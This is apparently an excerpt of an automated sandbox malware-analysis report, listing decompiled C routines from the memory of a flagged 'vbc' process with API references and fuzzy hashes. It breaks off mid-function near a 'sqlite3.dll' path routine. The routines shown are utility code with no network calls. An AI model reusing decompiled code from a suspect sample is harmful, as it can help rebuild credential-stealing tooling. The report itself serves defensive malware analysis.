                                                              • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040B48C
                                                              • PostMessageA.USER32 ref: 0040B52F
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Message$MenuPostSendStringmemset
                                                              • String ID:
                                                              • API String ID: 3798638045-0
                                                              • Opcode ID: c3aa6ddd336313682f51672c6081f6f8049648b04dcffedc212cd8d1236b5249
                                                              • Instruction ID: e99ea3cd5ae45d968ce1bb78ba156cefd6297a3afaf0c32d246f8b1269deedf3
                                                              • Opcode Fuzzy Hash: c3aa6ddd336313682f51672c6081f6f8049648b04dcffedc212cd8d1236b5249
                                                              • Instruction Fuzzy Hash: 5041F430600611EBCB25DF24CC85A96B7A4FF14324F1482B6E958AB2C6C378DE91CBDC
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 94%
                                                              			E0040A119(void* __eax, void* __eflags, char* _a4, intOrPtr _a8) {
                                                              				intOrPtr _v8;
                                                              				signed int _v12;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v20;
                                                              				void* __ebx;
                                                              				signed int _t63;
                                                              				intOrPtr _t67;
                                                              				intOrPtr _t72;
                                                              				intOrPtr _t74;
                                                              				signed int _t79;
                                                              				void* _t84;
                                                              				signed int _t86;
                                                              				char* _t98;
                                                              				void* _t100;
                                                              				void* _t102;
                                                              				void* _t104;
                                                              				void* _t106;
                                                              				void* _t107;
                                                              
                                                              				_t84 = __eax;
                                                              				E0040892D(__eax, __eflags);
                                                              				_t86 = 0;
                                                              				_v12 = 0;
                                                              				while(1) {
                                                              					_t98 = _a4;
                                                              					if( *((intOrPtr*)(_t86 + _t98)) - 0x30 > 9) {
                                                              						break;
                                                              					}
                                                              					_t86 = _t86 + 1;
                                                              					if(_t86 < 1) {
                                                              						continue;
                                                              					}
                                                              					if(strlen(_t98) >= 3) {
                                                              						break;
                                                              					}
                                                              					_t79 = atoi(_a4);
                                                              					if(_t79 >= 0 && _t79 <  *((intOrPtr*)(_t84 + 0x20))) {
                                                              						_v12 =  *((intOrPtr*)( *( *((intOrPtr*)(_t84 + 0x24)) + _t79 * 4) * 0x14 +  *((intOrPtr*)(_t84 + 0x1b4))));
                                                              					}
                                                              					L21:
                                                              					if(_a8 != 0) {
                                                              						_v12 = _v12 | 0x00001000;
                                                              					}
                                                              					_t63 = _v12;
                                                              					 *0x41748c =  *0x41748c + 1;
                                                              					 *((intOrPtr*)(0x417490 +  *0x41748c * 4)) = _t63;
                                                              					return _t63;
                                                              				}
                                                              				_t104 = 0;
                                                              				__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
                                                              				_v16 = 0;
                                                              				_v8 = 0;
                                                              				if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
                                                              					L14:
                                                              					_t100 = 0;
                                                              					__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
                                                              					_v8 = 0;
                                                              					if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
                                                              						L20:
                                                              						goto L21;
                                                              					}
                                                              					_t106 = 0;
                                                              					__eflags = 0;
                                                              					do {
                                                              						_v20 = E004069D2(0, _a4);
                                                              						_t67 = E004069D2(0, _a4);
                                                              						__eflags = _v20;
                                                              						if(_v20 >= 0) {
                                                              							L18:
                                                              							_v12 =  *((intOrPtr*)(_t106 +  *((intOrPtr*)(_t84 + 0x1b4))));
                                                              							goto L19;
                                                              						}
                                                              						__eflags = _t67;
                                                              						if(_t67 < 0) {
                                                              							goto L19;
                                                              						}
                                                              						goto L18;
                                                              						L19:
                                                              						_v8 = _v8 + 1;
                                                              						_t100 = _t100 + 0x10;
                                                              						_t106 = _t106 + 0x14;
                                                              						__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
                                                              					} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
                                                              					goto L20;
                                                              				}
                                                              				_t102 = 0;
                                                              				__eflags = 0;
                                                              				do {
                                                              					_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x1b4)) + _t104 + 0x10));
                                                              					_push(_a4);
                                                              					_push(_t72);
                                                              					L004115C4();
                                                              					_push(_a4);
                                                              					_v20 = _t72;
                                                              					_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x34)) + _t102 + 0xc));
                                                              					_push(_t74);
                                                              					L004115C4();
                                                              					_t107 = _t107 + 0x10;
                                                              					__eflags = _v20;
                                                              					if(_v20 == 0) {
                                                              						L11:
                                                              						_v12 =  *(_t104 +  *((intOrPtr*)(_t84 + 0x1b4)));
                                                              						_v16 = 1;
                                                              						goto L12;
                                                              					}
                                                              					__eflags = _t74;
                                                              					if(_t74 != 0) {
                                                              						goto L12;
                                                              					}
                                                              					goto L11;
                                                              					L12:
                                                              					_v8 = _v8 + 1;
                                                              					_t102 = _t102 + 0x10;
                                                              					_t104 = _t104 + 0x14;
                                                              					__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
                                                              				} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
                                                              				__eflags = _v16;
                                                              				if(_v16 != 0) {
                                                              					goto L20;
                                                              				}
                                                              				goto L14;
                                                              			}





















                                                              0x0040a120
                                                              0x0040a122
                                                              0x0040a127
                                                              0x0040a129
                                                              0x0040a12c
                                                              0x0040a12c
                                                              0x0040a136
                                                              0x00000000
                                                              0x00000000
                                                              0x0040a138
                                                              0x0040a13c
                                                              0x00000000
                                                              0x00000000
                                                              0x0040a148
                                                              0x00000000
                                                              0x00000000
                                                              0x0040a14d
                                                              0x0040a155
                                                              0x0040a176
                                                              0x0040a176
                                                              0x0040a257
                                                              0x0040a25c
                                                              0x0040a25e
                                                              0x0040a25e
                                                              0x0040a26b
                                                              0x0040a26e
                                                              0x0040a274
                                                              0x0040a27c
                                                              0x0040a27c
                                                              0x0040a17f
                                                              0x0040a181
                                                              0x0040a188
                                                              0x0040a18b
                                                              0x0040a18e
                                                              0x0040a1f2
                                                              0x0040a1f2
                                                              0x0040a1f4
                                                              0x0040a1fa
                                                              0x0040a1fd
                                                              0x0040a255
                                                              0x00000000
                                                              0x0040a256
                                                              0x0040a1ff
                                                              0x0040a1ff
                                                              0x0040a201
                                                              0x0040a21f
                                                              0x0040a224
                                                              0x0040a229
                                                              0x0040a22f
                                                              0x0040a235
                                                              0x0040a23e
                                                              0x00000000
                                                              0x0040a23e
                                                              0x0040a231
                                                              0x0040a233
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040a241
                                                              0x0040a241
                                                              0x0040a247
                                                              0x0040a24a
                                                              0x0040a24d
                                                              0x0040a24d
                                                              0x00000000
                                                              0x0040a201
                                                              0x0040a190
                                                              0x0040a190
                                                              0x0040a192
                                                              0x0040a198
                                                              0x0040a19c
                                                              0x0040a19f
                                                              0x0040a1a0
                                                              0x0040a1a5
                                                              0x0040a1a8
                                                              0x0040a1ae
                                                              0x0040a1b2
                                                              0x0040a1b3
                                                              0x0040a1b8
                                                              0x0040a1bb
                                                              0x0040a1bf
                                                              0x0040a1c5
                                                              0x0040a1ce
                                                              0x0040a1d1
                                                              0x00000000
                                                              0x0040a1d1
                                                              0x0040a1c1
                                                              0x0040a1c3
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040a1d8
                                                              0x0040a1d8
                                                              0x0040a1de
                                                              0x0040a1e1
                                                              0x0040a1e4
                                                              0x0040a1e4
                                                              0x0040a1ec
                                                              0x0040a1f0
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000

                                                              APIs
                                                                • Part of subcall function 0040892D: ??2@YAPAXI@Z.MSVCRT ref: 0040894E
                                                                • Part of subcall function 0040892D: ??3@YAXPAX@Z.MSVCRT ref: 00408A15
                                                              • strlen.MSVCRT ref: 0040A13F
                                                              • atoi.MSVCRT ref: 0040A14D
                                                              • _mbsicmp.MSVCRT ref: 0040A1A0
                                                              • _mbsicmp.MSVCRT ref: 0040A1B3
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _mbsicmp$??2@??3@atoistrlen
                                                              • String ID:
                                                              • API String ID: 4107816708-0
                                                              • Opcode ID: 04d0626d4e34a8bed9540d47d501c89c47d505d3d6eba4bb40819434c6ba53c8
                                                              • Instruction ID: ad5e67b725479cd3c0fe98911646f79d6f4c04cefe3616236e53ea043d5b2769
                                                              • Opcode Fuzzy Hash: 04d0626d4e34a8bed9540d47d501c89c47d505d3d6eba4bb40819434c6ba53c8
                                                              • Instruction Fuzzy Hash: 24414B75900304AFCB10DFA9C580A9ABBF5FB48308F1084BEEC05AB392D7399A51CB59
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00410E8A(char* __eax, void* __edi) {
                                                              				unsigned int _v5;
                                                              				signed int _v6;
                                                              				signed int _v7;
                                                              				intOrPtr _v12;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _t37;
                                                              				char* _t56;
                                                              				signed char _t57;
                                                              				char* _t67;
                                                              				void* _t68;
                                                              				void* _t69;
                                                              
                                                              				_t68 = __edi;
                                                              				_t56 = __eax;
                                                              				_t69 = 0;
                                                              				_t37 = strlen(__eax) + 0xfffffffd;
                                                              				_v16 = _t37;
                                                              				if(_t37 < 0) {
                                                              					L18:
                                                              					 *((char*)(_t69 + _t68)) = 0;
                                                              					return _t69;
                                                              				}
                                                              				_v12 = 0xfffffffe;
                                                              				_v12 = _v12 - _t56;
                                                              				_t5 = _t56 + 2; // 0x411004
                                                              				_t67 = _t5;
                                                              				while(1) {
                                                              					_t6 = _t67 - 2; // 0x75fff88b
                                                              					_t39 =  *_t6;
                                                              					if( *_t6 != 0x2e) {
                                                              						_v6 = E00410E56(_t39);
                                                              					} else {
                                                              						_v6 = 0x3e;
                                                              					}
                                                              					_t9 = _t67 - 1; // 0xfc75fff8
                                                              					_t41 =  *_t9;
                                                              					if( *_t9 != 0x2e) {
                                                              						_v5 = E00410E56(_t41);
                                                              					} else {
                                                              						_v5 = 0x3e;
                                                              					}
                                                              					_t43 =  *_t67;
                                                              					if( *_t67 != 0x2e) {
                                                              						_t57 = E00410E56(_t43);
                                                              					} else {
                                                              						_t57 = 0x3e;
                                                              					}
                                                              					_t45 =  *((intOrPtr*)(_t67 + 1));
                                                              					if( *((intOrPtr*)(_t67 + 1)) != 0x2e) {
                                                              						_v7 = E00410E56(_t45);
                                                              					} else {
                                                              						_v7 = 0x3e;
                                                              					}
                                                              					 *(_t68 + _t69) = _v5 >> 0x00000004 | _v6 << 0x00000002;
                                                              					if( *_t67 == 0x2d) {
                                                              						break;
                                                              					}
                                                              					 *(_t69 + _t68 + 1) = _t57 >> 0x00000002 | _v5 << 0x00000004;
                                                              					if( *((char*)(_t67 + 1)) == 0x2d) {
                                                              						 *((char*)(_t69 + _t68 + 2)) = 0;
                                                              						_t34 = _t69 + 2; // 0x2
                                                              						return _t34;
                                                              					}
                                                              					_t69 = _t69 + 3;
                                                              					 *(_t69 + _t68 - 1) = _t57 << 0x00000006 | _v7;
                                                              					_t25 = _t69 + 5; // 0x2
                                                              					_t67 = _t67 + 4;
                                                              					if(_t25 >= 0x3ff || _v12 + _t67 > _v16) {
                                                              						goto L18;
                                                              					} else {
                                                              						continue;
                                                              					}
                                                              				}
                                                              				 *(_t69 + _t68 + 1) = 0;
                                                              				_t31 = _t69 + 1; // 0x1
                                                              				return _t31;
                                                              			}














                                                              0x00410e8a
                                                              0x00410e92
                                                              0x00410e95
                                                              0x00410e9c
                                                              0x00410ea0
                                                              0x00410ea3
                                                              0x00410f5b
                                                              0x00410f5b
                                                              0x00000000
                                                              0x00410f5f
                                                              0x00410ea9
                                                              0x00410eb0
                                                              0x00410eb3
                                                              0x00410eb3
                                                              0x00410eb6
                                                              0x00410eb6
                                                              0x00410eb6
                                                              0x00410ebb
                                                              0x00410ec8
                                                              0x00410ebd
                                                              0x00410ebd
                                                              0x00410ebd
                                                              0x00410ecb
                                                              0x00410ecb
                                                              0x00410ed0
                                                              0x00410edd
                                                              0x00410ed2
                                                              0x00410ed2
                                                              0x00410ed2
                                                              0x00410ee0
                                                              0x00410ee4
                                                              0x00410eef
                                                              0x00410ee6
                                                              0x00410ee6
                                                              0x00410ee6
                                                              0x00410ef1
                                                              0x00410ef6
                                                              0x00410f03
                                                              0x00410ef8
                                                              0x00410ef8
                                                              0x00410ef8
                                                              0x00410f14
                                                              0x00410f1a
                                                              0x00000000
                                                              0x00000000
                                                              0x00410f29
                                                              0x00410f31
                                                              0x00410f6f
                                                              0x00410f74
                                                              0x00000000
                                                              0x00410f74
                                                              0x00410f39
                                                              0x00410f3c
                                                              0x00410f40
                                                              0x00410f43
                                                              0x00410f4b
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00410f4b
                                                              0x00410f65
                                                              0x00410f6a
                                                              0x00000000

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: strlen
                                                              • String ID: >$>$>
                                                              • API String ID: 39653677-3911187716
                                                              • Opcode ID: cc9d2e4949e9ff96ebc93a83fa171427e13732e23a33d014681ceaf85bfc699f
                                                              • Instruction ID: 69dee6f6c2e5f632f5f5b053a668a00b89048f502478ac4f4f3cd81ce8891ac8
                                                              • Opcode Fuzzy Hash: cc9d2e4949e9ff96ebc93a83fa171427e13732e23a33d014681ceaf85bfc699f
                                                              • Instruction Fuzzy Hash: D331D5318097C49ED7218B6980563EFFFA14F26304F188ADAD0E557343D2EC96CAC75A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 50%
                                                              			E0040BC6D(signed int __eax, void* __ecx, void* _a4) {
                                                              				unsigned int _t23;
                                                              				signed int _t25;
                                                              				unsigned int _t34;
                                                              				unsigned int _t36;
                                                              				void* _t40;
                                                              				unsigned int _t45;
                                                              				void* _t46;
                                                              				int _t47;
                                                              				void* _t48;
                                                              				void* _t50;
                                                              
                                                              				_t48 = __ecx;
                                                              				_t34 = __eax;
                                                              				_t23 =  *(__ecx + 0x10);
                                                              				_t36 = _t23 + __eax * 8;
                                                              				 *(__ecx + 0x10) = _t36;
                                                              				if(_t36 < _t23) {
                                                              					 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + 1;
                                                              				}
                                                              				 *((intOrPtr*)(_t48 + 0x14)) =  *((intOrPtr*)(_t48 + 0x14)) + (_t34 >> 0x1d);
                                                              				_t25 = _t23 >> 0x00000003 & 0x0000003f;
                                                              				if(_t25 == 0) {
                                                              					L6:
                                                              					if(_t34 >= 0x40) {
                                                              						_t45 = _t34 >> 6;
                                                              						do {
                                                              							memcpy(_t48 + 0x18, _a4, 0x40);
                                                              							_t50 = _t50 + 0xc;
                                                              							E0040BD8A(_t48 + 0x18, _t48);
                                                              							_a4 = _a4 + 0x40;
                                                              							_t34 = _t34 - 0x40;
                                                              							_t45 = _t45 - 1;
                                                              						} while (_t45 != 0);
                                                              					}
                                                              					_push(_t34);
                                                              					_push(_a4);
                                                              					_push(_t48 + 0x18);
                                                              				} else {
                                                              					_t46 = 0x40;
                                                              					_t47 = _t46 - _t25;
                                                              					_t40 = _t48 + 0x18 + _t25;
                                                              					if(_t34 >= _t47) {
                                                              						memcpy(_t40, _a4, _t47);
                                                              						_t50 = _t50 + 0xc;
                                                              						E0040BD8A(_t48 + 0x18, _t48);
                                                              						_a4 = _a4 + _t47;
                                                              						_t34 = _t34 - _t47;
                                                              						goto L6;
                                                              					} else {
                                                              						_push(_t34);
                                                              						_push(_a4);
                                                              						_push(_t40);
                                                              					}
                                                              				}
                                                              				return memcpy();
                                                              			}













                                                              0x0040bc72
                                                              0x0040bc74
                                                              0x0040bc76
                                                              0x0040bc79
                                                              0x0040bc7f
                                                              0x0040bc82
                                                              0x0040bc84
                                                              0x0040bc84
                                                              0x0040bc8c
                                                              0x0040bc92
                                                              0x0040bc95
                                                              0x0040bcc7
                                                              0x0040bcca
                                                              0x0040bcce
                                                              0x0040bcd1
                                                              0x0040bcda
                                                              0x0040bcdf
                                                              0x0040bce7
                                                              0x0040bcec
                                                              0x0040bcf0
                                                              0x0040bcf3
                                                              0x0040bcf3
                                                              0x0040bcd1
                                                              0x0040bcf6
                                                              0x0040bcf7
                                                              0x0040bcfd
                                                              0x0040bc97
                                                              0x0040bc99
                                                              0x0040bc9a
                                                              0x0040bc9e
                                                              0x0040bca2
                                                              0x0040bcb0
                                                              0x0040bcb5
                                                              0x0040bcbd
                                                              0x0040bcc2
                                                              0x0040bcc5
                                                              0x00000000
                                                              0x0040bca4
                                                              0x0040bca4
                                                              0x0040bca5
                                                              0x0040bca8
                                                              0x0040bca8
                                                              0x0040bca2
                                                              0x0040bd0a

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: @
                                                              • API String ID: 3510742995-2766056989
                                                              • Opcode ID: 72109dd3c061e5e7965399845177051784b2c116136a58e32e92d3e3a8f21608
                                                              • Instruction ID: cecad1072309209c94eeb2778a75b30bbc980c70aaade9bdc77468b7d13379ad
                                                              • Opcode Fuzzy Hash: 72109dd3c061e5e7965399845177051784b2c116136a58e32e92d3e3a8f21608
                                                              • Instruction Fuzzy Hash: 8B112BB29003056BDB288F16D8809AA77EAEF50344700063FFD0796291FB39DE55C6DC
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 93%
                                                              			E00406F6F(void** __esi, intOrPtr _a4, intOrPtr _a8) {
                                                              				signed int _t21;
                                                              				signed int _t23;
                                                              				void* _t24;
                                                              				signed int _t31;
                                                              				void* _t33;
                                                              				void* _t44;
                                                              				signed int _t46;
                                                              				void* _t48;
                                                              				signed int _t51;
                                                              				int _t52;
                                                              				void** _t53;
                                                              				void* _t58;
                                                              
                                                              				_t53 = __esi;
                                                              				_t1 =  &(_t53[1]); // 0x0
                                                              				_t51 =  *_t1;
                                                              				_t21 = 0;
                                                              				if(_t51 <= 0) {
                                                              					L4:
                                                              					_t2 =  &(_t53[2]); // 0x8
                                                              					_t33 =  *_t53;
                                                              					_t23 =  *_t2 + _t51;
                                                              					_t46 = 8;
                                                              					_t53[1] = _t23;
                                                              					_t24 = _t23 * _t46;
                                                              					_push( ~(0 | _t58 > 0x00000000) | _t24);
                                                              					L004115D0();
                                                              					_t10 =  &(_t53[1]); // 0x0
                                                              					 *_t53 = _t24;
                                                              					memset(_t24, 0,  *_t10 << 3);
                                                              					_t52 = _t51 << 3;
                                                              					memcpy( *_t53, _t33, _t52);
                                                              					if(_t33 != 0) {
                                                              						_push(_t33);
                                                              						L004115D6();
                                                              					}
                                                              					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
                                                              					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
                                                              				} else {
                                                              					_t44 =  *__esi;
                                                              					_t48 = _t44;
                                                              					while( *_t48 != 0) {
                                                              						_t21 = _t21 + 1;
                                                              						_t48 = _t48 + 8;
                                                              						_t58 = _t21 - _t51;
                                                              						if(_t58 < 0) {
                                                              							continue;
                                                              						} else {
                                                              							goto L4;
                                                              						}
                                                              						goto L7;
                                                              					}
                                                              					_t31 = _t21 << 3;
                                                              					 *((intOrPtr*)(_t44 + _t31)) = _a4;
                                                              					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
                                                              				}
                                                              				L7:
                                                              				return 1;
                                                              			}















                                                              0x00406f6f
                                                              0x00406f70
                                                              0x00406f70
                                                              0x00406f73
                                                              0x00406f77
                                                              0x00406f8a
                                                              0x00406f8a
                                                              0x00406f8e
                                                              0x00406f90
                                                              0x00406f96
                                                              0x00406f97
                                                              0x00406f9a
                                                              0x00406fa3
                                                              0x00406fa4
                                                              0x00406fa9
                                                              0x00406fb3
                                                              0x00406fb5
                                                              0x00406fba
                                                              0x00406fc1
                                                              0x00406fcb
                                                              0x00406fcd
                                                              0x00406fce
                                                              0x00406fd3
                                                              0x00406fda
                                                              0x00406fe3
                                                              0x00406f79
                                                              0x00406f79
                                                              0x00406f7b
                                                              0x00406f7d
                                                              0x00406f82
                                                              0x00406f83
                                                              0x00406f86
                                                              0x00406f88
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f88
                                                              0x00406ff3
                                                              0x00406ff6
                                                              0x00406fff
                                                              0x00406fff
                                                              0x00406fe8
                                                              0x00406fec

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ??2@??3@memcpymemset
                                                              • String ID:
                                                              • API String ID: 1865533344-0
                                                              • Opcode ID: 51d873ac656c15b7a7b4c95b09edac65cc2407af7c36c5c472b2660f0814b8dc
                                                              • Instruction ID: 30667c860212afb2fcb1bf0ba773cc68d22997902d766bb0abd15f5aaececc89
                                                              • Opcode Fuzzy Hash: 51d873ac656c15b7a7b4c95b09edac65cc2407af7c36c5c472b2660f0814b8dc
                                                              • Instruction Fuzzy Hash: 81118F71204601AFD328DF1DD881A27F7E6FFD8340B21892EE59B87391DA35E841CB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 37%
                                                              			E0040EFAE(char* __esi, char _a4, intOrPtr _a8) {
                                                              				void* _v8;
                                                              				char* _v16;
                                                              				intOrPtr _v20;
                                                              				intOrPtr _v24;
                                                              				intOrPtr _v28;
                                                              				intOrPtr _v32;
                                                              				intOrPtr _v36;
                                                              				char _v40;
                                                              				char _v304;
                                                              				char* _t18;
                                                              				char* _t22;
                                                              				char* _t23;
                                                              				intOrPtr* _t24;
                                                              				intOrPtr* _t26;
                                                              				intOrPtr _t30;
                                                              				void* _t35;
                                                              				char* _t36;
                                                              
                                                              				_t18 =  &_v8;
                                                              				_t30 = 0;
                                                              				__imp__SHGetMalloc(_t18);
                                                              				if(_t18 >= 0) {
                                                              					_v40 = _a4;
                                                              					_v28 = _a8;
                                                              					_t22 =  &_v40;
                                                              					_v36 = 0;
                                                              					_v32 = 0;
                                                              					_v24 = 4;
                                                              					_v20 = E0040EF36;
                                                              					_v16 = __esi;
                                                              					__imp__SHBrowseForFolderA(_t22, _t35);
                                                              					_t36 = _t22;
                                                              					if(_t36 != 0) {
                                                              						_t23 =  &_v304;
                                                              						__imp__SHGetPathFromIDListA(_t36, _t23);
                                                              						if(_t23 != 0) {
                                                              							_t30 = 1;
                                                              							strcpy(__esi,  &_v304);
                                                              						}
                                                              						_t24 = _v8;
                                                              						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
                                                              						_t26 = _v8;
                                                              						 *((intOrPtr*)( *_t26 + 8))(_t26);
                                                              					}
                                                              				}
                                                              				return _t30;
                                                              			}




















                                                              0x0040efb8
                                                              0x0040efbc
                                                              0x0040efbe
                                                              0x0040efc6
                                                              0x0040efcb
                                                              0x0040efd1
                                                              0x0040efd5
                                                              0x0040efd9
                                                              0x0040efdc
                                                              0x0040efdf
                                                              0x0040efe6
                                                              0x0040efed
                                                              0x0040eff0
                                                              0x0040eff6
                                                              0x0040effa
                                                              0x0040effc
                                                              0x0040f004
                                                              0x0040f00c
                                                              0x0040f016
                                                              0x0040f017
                                                              0x0040f01d
                                                              0x0040f01e
                                                              0x0040f025
                                                              0x0040f028
                                                              0x0040f02e
                                                              0x0040f02e
                                                              0x0040f031
                                                              0x0040f036

                                                              APIs
                                                              • SHGetMalloc.SHELL32(?), ref: 0040EFBE
                                                              • SHBrowseForFolderA.SHELL32(?), ref: 0040EFF0
                                                              • SHGetPathFromIDListA.SHELL32(00000000,?), ref: 0040F004
                                                              • strcpy.MSVCRT(?,?), ref: 0040F017
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: BrowseFolderFromListMallocPathstrcpy
                                                              • String ID:
                                                              • API String ID: 409945605-0
                                                              • Opcode ID: 363e444f0183eb3209581039a296e9ed2a0e0cb40b9c5b89ec9b93d888cfbacc
                                                              • Instruction ID: 0bece651b4572a5d25d0fced66708dfb83f65978f11dfbdadd7c1eadd6bf4f14
                                                              • Opcode Fuzzy Hash: 363e444f0183eb3209581039a296e9ed2a0e0cb40b9c5b89ec9b93d888cfbacc
                                                              • Instruction Fuzzy Hash: DD11F7B5900208AFCB10DFA9D9889EEBBFCFB49310F10447AEA05E7241D779DA458B64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 80%
                                                              			E0040A437(void* __esi) {
                                                              				void* _v260;
                                                              				char _v516;
                                                              				void* __ebx;
                                                              				char* _t16;
                                                              				signed short _t25;
                                                              				signed short _t27;
                                                              				void* _t28;
                                                              
                                                              				_t28 = __esi;
                                                              				_push(E00408647( *((intOrPtr*)(__esi + 0x370))));
                                                              				_t25 = 4;
                                                              				sprintf( &_v260, E004078FF(_t25));
                                                              				_t16 = E00408BDE( *((intOrPtr*)(__esi + 0x370)), 0);
                                                              				if(_t16 > 0) {
                                                              					_push(_t16);
                                                              					_t27 = 5;
                                                              					sprintf( &_v516, E004078FF(_t27));
                                                              					_t16 = strcat( &_v260,  &_v516);
                                                              				}
                                                              				if( *((intOrPtr*)(_t28 + 0x108)) != 0) {
                                                              					return SendMessageA( *(_t28 + 0x114), 0x401, 0,  &_v260);
                                                              				}
                                                              				return _t16;
                                                              			}










                                                              0x0040a437
                                                              0x0040a44c
                                                              0x0040a44f
                                                              0x0040a45d
                                                              0x0040a46d
                                                              0x0040a474
                                                              0x0040a476
                                                              0x0040a479
                                                              0x0040a487
                                                              0x0040a49a
                                                              0x0040a49f
                                                              0x0040a4aa
                                                              0x00000000
                                                              0x0040a4c0
                                                              0x0040a4c7

                                                              APIs
                                                                • Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
                                                                • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                              • sprintf.MSVCRT ref: 0040A45D
                                                              • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040A4C0
                                                                • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,74B04DE0), ref: 0040797A
                                                                • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                              • sprintf.MSVCRT ref: 0040A487
                                                              • strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A49A
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: sprintf$LoadMessageSendStringmemcpystrcatstrcpystrlen
                                                              • String ID:
                                                              • API String ID: 919693953-0
                                                              • Opcode ID: 90207433884269e3a26f13c39c42963f5ff8dc1025de2d2684d4a636a9e51624
                                                              • Instruction ID: 75288aada6eb4f7a447a9cf13bdf828529425e42ebb21a5188d22772f738aad9
                                                              • Opcode Fuzzy Hash: 90207433884269e3a26f13c39c42963f5ff8dc1025de2d2684d4a636a9e51624
                                                              • Instruction Fuzzy Hash: 2601DBB250030466D721B775DD86FEB73AC6F00304F40447BB74AF6082DABCE9808B29
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 87%
                                                              			E0040F3BA(char* _a4) {
                                                              				void _v267;
                                                              				char _v268;
                                                              				int _t12;
                                                              				signed int _t16;
                                                              
                                                              				_v268 = 0;
                                                              				memset( &_v267, 0, 0x104);
                                                              				_t12 = strlen(_a4);
                                                              				_t5 = strlen("sqlite3.dll") + 1; // 0x1
                                                              				if(_t12 + _t5 >= 0x104) {
                                                              					_v268 = 0;
                                                              				} else {
